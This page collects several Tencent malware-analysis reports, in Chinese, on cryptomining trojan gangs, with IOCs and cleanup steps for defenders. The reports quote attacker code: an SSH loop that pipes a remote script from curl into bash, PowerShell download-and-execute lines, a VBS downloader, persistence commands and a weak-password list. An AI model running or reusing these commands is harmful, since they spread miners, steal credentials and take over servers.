标签: 挖矿木马

警惕 BasedMiner 挖矿木马爆破SQL弱口令入侵挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/b9Nkl6q4xLoADNosP9jFkw 一、背景 腾讯安全威胁情报中心检测到针对Windows服务器进行攻击的挖矿木马BasedMiner。该挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会下载Gh0st远控木马对系统进行控制,还会利用多个Windows漏洞进行提权攻击获得系统最高权限,植入门罗币挖矿木马进行挖矿,目前已获利8000元。 因其远控模块名为based.dll,腾讯安全中心将其命名为BasedMiner。BasedMiner入侵后在企业服务器植入远控木马,可能导致受害企业机密信息泄露,挖矿时严重消耗服务器资源,会影响正常业务运行。腾讯安全专家建议企业检查纠正使用弱口令登录服务器,修复服务器存在的安全漏洞,避免挖矿团伙入侵。 腾讯安全系列产品应对BasedMiner挖矿木马的响应清单如下,建议企业网管参考检查: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)BasedMiner挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)BasedMiner挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)BasedMiner挖矿木马关联的IOCs已支持识别检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀BasedMiner相关后门程序; 2)已支持 MS SQL弱密码检测 ; 3) 已支持Windows系统提权漏洞CVE-2018-8639检测; 4)已支持Windows系统提权漏洞CVE-2017-0213检测。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)通过协议检测BasedMiner相关木马与服务器的网络通信; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 非云企业安全防护 腾讯T-Sec终端安全管理系统(御点) 1)可查杀BasedMiner挖矿木马团伙入侵释放的后门木马程序; 2)腾讯御点可支持终端检查修复Windows提权漏洞(CVE-2018-8639)。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 二、样本分析 攻击团伙对MS SQL服务器爆破成功后,会通过shellcode直接下载挖矿模块lsass.txt、提权攻击模块8639.exe、New.exe以及远控模块Test.txt。 远控模块Test.txt被保存至C:\ProgramData\svchost.exe并执行,从资源文件中获取二进制数据“0X64”,写入文件C:\Program Files (x86)\Common Files\based.dll并加载到内存执行。 将based.dll写入注册表 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WcCemsvc_connection\Parameters,安装为服务” WcCemsvc_connection”进行启动。 该DLL为Gh0st远控木马模块,导出函数ServiceMain,首次加载时传入参数“install”进行安装,通过服务启动之后连接C2地址www[.]bjcptj.com:19966,执行各类远控命令。 8639.exe是Windows提权漏洞CVE-2018-8639利用程序,文件属性伪装成搜狗输入法安装程序(注意文件属于并无搜狗公司的数字签名,一看就知道这是伪造的)。 漏洞攻击程序作者为ze0r(https[:]//github.com/ze0r/CVE-2018-8639-exp) New.exe是Windows提权漏洞CVE-2017-0213利用程序。 lsass.txt是开源挖矿程序XMRig编译生成的挖矿木马,挖矿配置文件保存在资源文件“PEIZ”中,挖矿使用矿池pool.supportxmr.com:3333,门罗币钱包: 43TosPcYFbmi7GuQSQZhXHP5XhZ8K2w77XtvnP5m5pMGQGCmhgeq3ZTcBgrm62NZfzgG19fj5nEEZXoypbHHnm6SRJsLpKw BasedMiner目前已挖矿获得17XMR,折合人民币8000元。 IOCs Doamin www[.]bjcptj.com IP 221.212.96.254 Md5 Test.txt 97f35b7658f61380720073e86f2ada59 lsass.txt cfe6457baa60685a2f838e65705c02a1 new.exe f31a4049c6ed9f6f1395bbd5fc7c136f ju.exe c58cdbc08b03c24e6ae3647aeeeb2fe8 tu.exe aaabcbc46344b2e396a0f660c9d68724 8639.exe e8f0591076498c50e78504b4fb2055d3 URL http[:]//221.212.96.254:14563/8639.exe http[:]//221.212.96.254:14563/tu.exe http[:]//221.212.96.254:14563/ju.exe http[:]//221.212.96.254:14563/new.exe http[:]//221.212.96.254:14563/lsass.txt http[:]//221.212.96.254:14563/Test.txt http[:]//bjcptj.com/ju.exe http[:]//bjcptj.com:3215/8639.exe http[:]//bjcptj.com:3215/tu.exe

GuardMiner 挖矿木马近期活跃,具备蠕虫化主动攻击能力,已有较多企业中招

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/-nUrNilr-iq7kbmopaqXwA   概述 腾讯安全威胁情报中心检测到跨平台挖矿木马GuardMiner近期十分活跃,该木马会扫描攻击Redis、Drupal、Hadoop、Spring、thinkphp、WebLogic、SQLServer、Elasticsearch多个服务器组件漏洞,并在攻陷的Windows和Linux系统中分别执行恶意脚本init.ps1,init.sh,恶意脚本会进一步下载门罗币挖矿木马、清除竞品挖矿木马并进行本地持久化运行。在Linux系统上利用SSH连接和Redis弱口令爆破进行内网扩散攻击。因挖矿守护进程使用文件名为sysguard、sysguerd、phpguard,腾讯安全威胁情报中心将该挖矿木马命名为GuardMiner。因该病毒已具备蠕虫化主动攻击扩散的能力,近期已有较多企业中招。 样本分析 1、init.ps1攻击Windows系统,从服务器下载挖矿进程phpupdate.exe,配置文件config.json,扫描攻击进程networkmanager.exe,持久化脚本newdat.ps1,挖矿守护进程phpguard.exe,清理脚本clean.bat。 2、init.sh攻击Linux系统,从服务器下载挖矿进程phpupdate,配置文件config.json,持久化脚本newdat.sh,扫描攻击进程networkmanager,挖矿守护进程phpuguard。 3、门罗币挖矿进程phpupdate.exe占用CPU接近100%: 挖矿使用的三组矿池和钱包分别如下: xmr.f2pool.com:13531 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 xmr-eu2.nanopool.org:14444 43zqYTWj1JG1H1idZFQWwJZLTos3hbJ5iR3tJpEtwEi43UBbzPeaQxCRysdjYTtdc8aHao7csiWa5BTP9PfNYzyfSbbrwoR.v520 randomxmonero.hk.nicehash.com:3380 3HVQkSGfvyyQ8ACpShBhegoKGLuTCMCiAr.v520 4、清除竞品挖矿木马文件: 5、phpguard.exe、phpguard负责守护挖矿进程,进程退出后立即重启: 6、在Windows系统上通过安装计划任务持久化,每隔30分钟执行一次newdat.ps1: SchTasks.exe /Create /SC MINUTE /TN "Update service for Windows Service" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -File $HOME\newdat.ps1" /MO 30 /F 在Linux系统上通过定时任务持久化,每隔30分钟执行一次newdat.sh: crontab -l ; echo "*/30 * * * * sh /etc/newdat.sh >/dev/null 2>&1"   7、在Linux系统上还会通过sshown_hosts获取登录过的机器IP,建立SSH连接并执行远程shell脚本is.sh,进行内网扩散攻击: `if [ -f /root/.sshown_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE “\b([0-9]{1,3}\.){3}[0-9]{1,3}\b” /root/.sshown_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘curl -o-  http[:]//global.bitmex.com.de/cf67355a3333e6/is.sh | bash >/dev/null 2>&1 &’ & done fi` is.sh接着安装扫描工具Pnscan和Masscan针对全网段IP范围进行6379端口(Redis服务)扫描,并通过Redis弱口令爆破(密码字典:redis、root、oracle、password、p@aaw0rd、abc123、abc123!、123456、admin)以及未授权访问漏洞感染执行init.sh: 8、Windows系统上执行networkmanager.exe,Linux系统上执行networkmanager,开启漏洞扫描和利用攻击,针对以下服务器组件,攻击成功后在Windows系统执行Powershell脚本,在Linux系统执行shell脚本进行进行感染:Redis未授权访问漏洞; Drupal框架CVE-2018-7600漏洞; Hadoop未授权漏洞; Spring框架CVE-2018-1273漏洞; thinkphp框架TP5高危漏洞; WebLogic框架CVE-2017-10271漏洞; SQLServer框架xcmd_shell、SP_OACreate注入提权漏洞; Elasticsearch框架CVE-2015-1427、CVE-2014-3120远程代码执行漏洞。   病毒清除建议: 1.Windows系统用户推荐使用腾讯T-sec终端安全管理系统(腾讯御点)查杀; 2.Linux系统用户可按以下步骤手动清除: a.检查tmp、etc目录下是否具有以下文件,杀死对应的进程并删除文件: /tmp/phpupdate /tmp/networkmanager /tmp/phpguard /tmp/newdat.sh /tmp/config.json /etc/phpupdate /etc/networkmanager /etc/config.json /etc/newdat.sh b.检查crontab计划任务中是否包含执行”/tmp/newdat.sh”相关代码,如有删除该定时任务。 IOCs IP 185.247.117.64 209.182.218.161 178.157.91.26 146.71.79.230 43.245.222.57 URL http[:]//185.247.117.64/cf67355/phpupdate http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate http[:]//185.247.117.64/cf67355/newdat.sh http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.sh http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager http[:]//185.247.117.64/cf67355/phpguard http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard http[:]//185.247.117.64/cf67355/phpupdate.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpupdate.exe http[:]//185.247.117.64/cf67355/config.json http[:]//global.bitmex.com.de/cf67355a3333e6/config.json http[:]//185.247.117.64/cf67355/networkmanager.exe http[:]//global.bitmex.com.de/cf67355a3333e6/networkmanager.exe http[:]//185.247.117.64/cf67355/newdat.ps1 http[:]//global.bitmex.com.de/cf67355a3333e6/newdat.ps1 http[:]//185.247.117.64/cf67355/phpguard.exe http[:]//global.bitmex.com.de/cf67355a3333e6/phpguard.exe http[:]//185.247.117.64/cf67355/clean.bat http[:]//global.bitmex.com.de/cf67355a3333e6/clean.bat    

“贪吃蛇”挖矿木马升级提权工具,对企业网络威胁加剧​

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/QBkjAGuGBIZ7yzDNEYhxOg   概述 “贪吃蛇”挖矿木马曾在2019年4月被腾讯安全团队发现,因其在感染服务器后即会清除其他挖矿木马独占服务器资源而得名。“贪吃蛇”挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击,爆破成功后会进行提权攻击获得系统权限,然后植入门罗币挖矿木马以及大灰狼远控木马。 “贪吃蛇”挖矿木马新变种的攻击流程 该团伙在2019年也对木马进行过一次更新,但第二个版本中被其他团队植入了后门(黑吃黑也是传统套路)。腾讯安全团队本次捕获的“贪吃蛇”挖矿木马新版在攻击流程上与前面略有区别。首先病毒对提权工具进行更新,抛弃了2015及以前的提权漏洞,引入2019年新的提权漏洞,病毒爆破成功之后提权获得系统权限的概率得以大幅提升。 “贪吃蛇”新版本清理的竞品挖矿木马也比旧版更多, 病毒还会添加Windows防火墙规则阻止其他挖矿木马入侵。攻击流程上也有所简化,不再借用第三方大厂的白文件,而是直接劫持系统进程或服务进行攻击。 腾讯安全T-Sec终端安全管理系统及腾讯电脑管家均可查杀该病毒,腾讯安全专家建议企业网管尽快纠正MS SQL服务器存在的弱口令风险,避免黑客远程爆破成功。 详细分析 攻击团伙对MS SQL服务器爆破成功后,会直接下载提权模块攻击以获取系统最高权限。与第一版贪吃蛇不同的是,第一版提权完成后会从网络上下载后续功能模块,而新版中在提权模块中直接包含后续的功能模块,大部分内嵌在PE中。 新版内嵌PE会存放在数据段 而旧版本是内嵌在资源段中 流程开始后首先释放提权模块,罗列了一下新版贪吃蛇与旧版使用的提权工具区别,提权漏洞升级了。 旧版本: 新版本: 提权工作完成后,释放SQLA.exe文件,该文件内置6个PE文件,其中2个文件是密文形式存放,逐个分析其功能。 Rundllexe.Dll:这个dll有内嵌x64版本,会被注册为打印机程序 Dll启动rundllexe.Exe Rundllexe.exe启动后把大灰狼远控注入到svchost中 大灰狼模块被释放到C:\Windows\MpMgSvc.dll中 C2: down.361com.com 备份rundll代码到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ODBC\Rundll 接着下载x64.exe,hxxp://124.160.126.238/1.exe,这个模块主要用来投递挖矿木马,入口处通过修改Windows防火墙规则,阻止其他挖矿木马入侵。 解密出active_desktop_render.dll释放到c:\windows\help\ active_desktop_render.dll会把自身注册为服务,服务名GraphicsPerf_Svcs active_desktop_render.dll内置一个PE文件,解密后得到DeskTop EXE.主要负责投递挖矿木马,首先下载hxxp://118.45.42.72/Update.txt,文件中描述了挖矿木马名称及大小。 还需要根据配置描述,清除其他竞品挖矿木马 “加固清理”之后下载挖矿木马hxxp://www.362com.com/32.exe,并设置挖矿启动项,挖矿木马使用的文件名和系统文件名一样,以便伪装。 TrustedInsteller.exe WmiApSvr.exe WUDFhosts.exe HelpSvc.exe 劫持这4个系统文件,提高存活几率: 矿池及钱包仍然异或加密存储在文件中 矿池:pool.usa-138.com:80 钱包:4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S 清除其他挖矿木马也更加全面 IOCs MD5 3841eed7224b111b76b39fe032061ee7 a865ec970a4021f270359761d660547c 70e694d073c0440d9da37849b1a06321 4a72e30c0a582b082030adfd8345014f 645564cf1c80e047a6e90ac0f2d6a6b7 ce614abf6d6c1bbeefb887dea08c18a3 f03f640de2cb7929bbbafa3883d1b2a9 5d2e9716be941d7c77c05947390de736 3a1e14d9bbf7ac0967c18a24c4fd414b dc60a503fb8b36ab4c65cdfa5bd665a1 9450249ae964853a51d6b55cd55c373e f4f11dc6aa75d0f314eb698067882dd5 18936d7a1d489cb1db6ee9b48c6f1bd2 b660ad2c9793cd1259560bbbfbd89ce6 2ee0787a52aaca0207a73ce8048b0e55 URLs hxxp://www.362com.com/32.exe hxxp://www.362com.com/64.exe hxxp://118.45.42.72/Update.txt hxxp://118.45.42.72/22.exe hxxp://www.362com.com/Update.txt hxxp://124.160.126.238/1.exe hxxp://124.160.126.238/tq.exe hxxp://124.160.126.238/11.exe hxxp://124.160.126.238/Down.exe hxxp://124.160.126.238/MSSQL.exe Domain www.361com.com www.362com.com 22ssh.com IP 124.160.126.238 (ZoomEye搜索结果) 118.45.42.72 (ZoomEye搜索结果)

“匿影”挖矿木马持续活跃,入侵某旅游网站做病毒下载服务器

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ 一、背景 腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播,通过计划任务、WMI后门进行本地持久化,然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS(Handshake),还会利用regsvr32.exe加载执行DLL形式的木马程序,匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行,试图避免被安全厂商检测到。 “匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载,此次变种攻陷了某旅游文化网站并将其作为木马下载服务器,其使用过的公共网址如下: upload.ee 免费网盘 anonfiles.com 免费图床 sowcar.com 免费图床 popo8.com 免费图床 img.vim-cn.com 免费图床 urlxxx.at.ua 建站服务 mywebnew.ucoz.pl 建站服务 addressnet.do.am 建站服务 googlenew.moy.su 建站服务 ludengapp.com 某设计公司网站 worldyou.top 某文旅公司网站(新) 二、样本分析 “匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。   在攻陷的目标机器执行Payload(x86.dll或x64.dll), Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在,若不存在继续执行一段Base64编码的Powershell命令。 Base64编码的Powershell命令解码后内容如下: schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhAGEAdAAuAHgAeQB6AC8AdgBpAHAALgB0AHgAdAAnACkAKQA=" 该命令安装名为“VNware ”的计划任务,每隔80分钟执行一次另一段经过base64编码的Powershell命令,同样,解码后内容如下: IEX ((new-object net.webclient).downloadstring('http[:]//mywebsaat.xyz/vip.txt')) 然后计划任务从http[:]//mywebsaat.xyz/vip.txt下载vip.txt反复运行,并完成以下功能: 1、访问统计页面,记录攻击次数 2、安装计划任务“PCHunterDNS”和”\Microsoft\Windows\UPnP\Services”进而持久化执行恶意代码: IEX ((new-object net.webclient).downloadstring('https[:]//mywebsaat.xyz/123.jpg')) 3、通过注册表修改操作,关闭Windows Defender,同时开启WDigest缓存(可以从内存缓存中窃密用户名和登陆密码)。 在执行该步骤前,脚本会从百度官网下载LOGO图标https[:]//www.baidu.com/img/bd_logo1.png,并保存为C:\ProgramData\Defender.txt,通过判断该文件是否存在,来确认这个步骤是否执行过。 4、安装WMI后门(事件过滤器“fuckamm3”、事件消费者“fuckamm4”)持久化运行恶意代码IEX ((new-object net.webclient).downloadstring(‘http[:]//mywebsaat.xyz/kp.txt’)),而“fuckamm3”、“fuckamm4”是Mykings挖矿僵尸网络团伙使用的WMI后门名称,推测“匿影”挖矿木马团伙与Mykings挖矿僵尸网络可能有一定的关联。 5、下载和启动挖矿程序,脚本会从多个地址下载不同的挖矿程序,存放在不同的路径下,具体样本如下: C:\Users\Public\MicrosftEdgeCP.exe是显卡挖矿软件NBMiner (https://github.com/NebuTech/NBMiner/releases),支持NVIDIA、AMD显卡,支持GRIN、AE、CKB、SERO、SIPC、BTM、ETH、SWAP等币种的挖矿。 其中某旅游文化公司网站也被黑客攻陷作为挖矿木马下载服务器: WMI后门中的Powershell脚本kp.txt还会下载DLL木马https[:]//rss.mywebsaat.xyz/cccdll.jpg并利用regsvr32.exe加载执行,然后通过该DLL启动挖矿木马。 new-object System.Net.WebClient).DownloadFile( 'https[:]//rss.mywebsaat.xyz/cccdll.jpg','C:\Users\Public\eos.dll') `Start-Process -FilePath C:\Windows\SysWOW64\regsvr32.exe '/s C:\Users\Public\eos.dll'` 完成挖矿木马启动和持久化过程后,继续下载永恒之蓝攻击模块http[:]//rss.mywebsaat.xyz/yh.jpg,启动下一轮攻击: IOCs Domain mywebsaat.xyz rss.mywebsaat.xyz URL https[:]//www.upload.ee/files/11799957/1.txt.html https[:]//www.upload.ee/files/11814903/1.txt.html https[:]//www.upload.ee/files/11815494/1.txt.html https[:]//www.upload.ee/files/11816420/1.txt.html https[:]//www.upload.ee/files/11816445/1.txt.html https[:]//www.upload.ee/files/11822214/1.txt.html http[:]//mywebsaat.xyz/999.jpg https[:]//mywebsaat.xyz/xmr.jpg http[:]//mywebsaat.xyz/nb.jpg http[:]//mywebsaat.xyz/yh.jpg http[:]//mywebsaat.xyzc.jpg http[:]//mywebsaat.xyz/fxtxt.jpg http[:]//mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/xmr.jpg http[:]//rss.mywebsaat.xyzakhost.jpg http[:]//rss.mywebsaat.xyz/nb.jpg http[:]//rss.mywebsaat.xyz/yh.jpg http[:]//rss.mywebsaat.xyzc.jpg http[:]//rss.mywebsaat.xyz/fxtxt.jpg https[:]//mywebsaat.xyz/cccdll.jpg http[:]//mywebsaat.xyz/kp.txt https[:]//mywebsaat.xyz/123.jpg http[:]//www.worldyou.top/images/xmr.jpg http[:]//www.worldyou.top/images/tsakhost.jpg http[:]//www.worldyou.top/images/999.jpg http[:]//www.worldyou.top/images/btc.jpg http[:]//www.worldyou.top/images/fxtxt.jpg http[:]//www.worldyou.top/images/nb.jpg http[:]//www.worldyou.top/images/sd.jpg http[:]//www.worldyou.top/images/yh.jpg MD5 33110e53078ed5a0cf440d182878f30b 441a61cdd30502b3fcca03c28ccb49e8 5e20062b94f38e447be60f9f2b0286cd ee5d5f0e0fe7db7186f72d3d5256b1be f4fbfb10c441974ef5b892a35b08e6eb 85f25f9264664111f7df6dc76320b90b

“8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,预备发起DDoS攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ   一、背景 腾讯安全威胁情报中心检测到“8220”挖矿木马变种攻击。“8220”挖矿团伙擅长利用WebLogic、JBoss反序列化漏洞,Redis、Hadoop未授权访问漏洞等Web漏洞攻击服务器挖矿。近期我们发现该团伙在攻击活动中通过Apache Struts远程代码执行漏洞(CVE-2017-5638)、Tomcat弱口令爆破进行传播的木马大幅增加。 木马在横向移动阶段会利用Python实现的Redis未授权漏洞访问漏洞对随机生成的约16万个IP进行扫描攻击,并且利用植入的shell脚本hehe.sh继续利用已有公钥认证记录的机器建立SSH连接进行内网扩散,最终在失陷机器植入多款门罗币挖矿木马以及Tsunami僵尸网络木马,后者被该团伙用来进行DDoS攻击。 “8220”挖矿木马团伙的攻击目标包括Windows和Linux服务器,在其使用的FTP服务器上,可以发现针对不同操作系统的攻击模块。该团伙释放挖矿木马时,会检查服务器是否有其他挖矿木马运行,将所有竞争挖矿木马进程结束,以独占服务器资源。 根据代码的相似性、C2关联性、挖矿时使用的相同门罗币钱包以及配置文件解密方法、相似的FTP服务器,腾讯安全专家认为,2020年初出现的StartMiner与“8220”挖矿木马属于同一团伙。该团伙当前版本恶意程序与C2服务器的通信已不再使用“8220”端口,根据近期捕获到的样本对其攻击偏好使用的文件名进行总结,发现其具有使用多种脚本包括VBS、PHP、Python、Powershell、Shell进行组合攻击的特点。 二、解决方案 企业运维人员可参考以下方法手动清除Linux和Windows系统感染的挖矿木马,参考安全建议提升服务器的安全性。 Linux系统 a. Kill进程/tmp/sh、/tmp/x32b、/tmp/x64b b. 删除文件 /tmp/i686(md5: D4AE941C505EE53E344FB4D4C2E102B7)、 /tmp/ x86_64(md5: 9FE932AC3055045A46D44997A4C6D481) /tmp/x32b(md5: EE48AA6068988649E41FEBFA0E3B2169)、 /tmp/x64b(md5: C4D44EED4916675DD408FF0B3562FB1F) c.  删除包含“www.jukesxdbrxd.xyz”、“107.189.11.170”的crontab计划任务 安全建议: a. Redis 非必要情况不要暴露在公网,使用足够强壮的Redis口令 b. Tomcat服务器配置高强度密码认证 c.  设置ssh非交互方式登录时StrictHostKeyChecking=ask或StrictHostKeyChecking=yes Windows系统 a. 杀死进程isassx.exe、steamhuby.exe、issaasss、isasss.exe、ready.exe、oity.exe、kkw2.exe、12.exe、13.exe、mess.exe b. 删除文件: c:\windows\temp\app.vbs c:\windows\temp\apps.vbs C:\Windows\Temp\ready.exe C:\ProgramData\guvpgnkpwv\steamhuby.exe C:\ProgramData\tumtkffywq\issaasss C:\Windows\temp\12.exe C:\Windows\temp\12.exe C:\Windows\Temp\mess.exe %HOMEPATH%\why.ps1 %HOMEPATH%\schtasks.ps1 c.  删除执行内容包含“why.ps1、why2.ps1、why3.ps1、kkmswx.ps1”的计划任务 安全建议: 及时修复Apache Struts高危漏洞; Tomcat服务器配置高强度密码认证。 推荐政府机构、大中型企业、科研单位采用腾讯安全完整解决方案全面提升信息系统的安全性。 腾讯安全解决方案部署示意图(图片可放大) 政企用户可根据业务应用场景部署适当的安全产品,并根据腾讯安全威胁情报中心提供的情报数据配置各节点联防联动、统一协调管理,提升整体网络抗攻击能力。 腾讯安全系列产品应对8220挖矿木马的响应清单如下: 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)8220挖矿木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)8220挖矿木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截Redis未授权访问漏洞相关访问流量。 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)云镜已支持Apache Struts远程命令执行漏洞、Redis未授权访问漏洞的检测; 2)已支持查杀8220挖矿木马家族样本。 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受Apache Struts远程命令执行漏洞、Redis未授权访问漏洞影响。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持: 1)利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞相关联的IOCs已支持识别检测; 2)对利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵的相关协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀8220挖矿木马团伙入侵释放的后门木马程序、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用Apache Struts远程命令执行漏洞、Redis未授权访问漏洞入侵相关的网络通信。 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/ 三、利用Struts漏洞(CVE-2017-5638)入侵服务器挖矿 Apache Struts是一款用于创建企业级Java Web应用的开源框架,Struts2存在远程代码执行的严重漏洞(漏洞编号S2-045,CVE编号:CVE-2017-5638),并定级为高风险,影响版本范围为Struts 2.3.5 – Struts 2.3.31和Struts 2.5 – Struts 2.5.10。 该漏洞能允许黑客远程代码执行,相当于整台服务器已托管给黑客,黑客可以利用此漏洞获取web应用的源程序,修改web应用内容,获取数据库密码并盗取数据库信息,更改系统代码,更改数据库密码等等。 黑客批量扫描Web服务器并针对存在CVE-2017-5638漏洞的机器进行攻击,然后通过shell写入VBS脚本文件app.vbs并启动运行。 c:\windows\temp\app.vbs代码内容如下: Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://www.jukesxdbrxd.xyz/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile “C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (“C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/steamhuby.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/steamhuby.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/steamhuby.exe”) Set Post = CreateObject(“Msxml2.XMLHTTP”) Set Shell = CreateObject(“Wscript.Shell”) Post.Open “GET”,”http://104.244.75.25/kmkww.exe”,0 Post.Send() Set aGet = CreateObject(“ADODB.Stream”) aGet.Mode = 3 aGet.Type = 1 aGet.Open() aGet.Write(Post.responseBody) aGet.SaveToFile ” C:/Windows/temp/kmkww.exe”,2 wscript.sleep 10000 Shell.Run (” C:/Windows/temp/kmkww.exe”) app.vbs下载得到挖矿木马母体steamhuby.exe,该样本拷贝自身到C:\ProgramData\guvpgnkpwv\steamhuby.exe,然后访问下载解密的更新配置文件url,将挖矿配置文件信息cfg、cfgi释放到该文件夹下。 该钱包目前在公开矿池pool.hashvault.pro挖矿获得30个XMR,但是由于其使用多个私有矿池挖矿,实际收益会远大于这个数目。 